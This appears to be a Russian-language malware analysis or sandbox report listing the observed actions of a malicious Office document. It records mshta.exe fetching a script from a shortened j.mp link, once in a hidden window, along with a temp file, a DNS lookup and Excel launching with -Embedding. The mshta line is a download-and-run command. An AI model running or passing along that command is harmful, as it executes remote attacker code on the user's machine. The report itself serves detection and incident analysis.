Техническая информация
- '<SYSTEM32>\mshta.exe' http:\\j.mp\adjM9dXAsxfsaasdi
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{7b0f28e4-8bb2-4a79-8105-ca7dcea7ea0a}.tmp
- DNS ASK j.#p
- '<SYSTEM32>\mshta.exe' http:\\j.mp\adjM9dXAsxfsaasdi' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding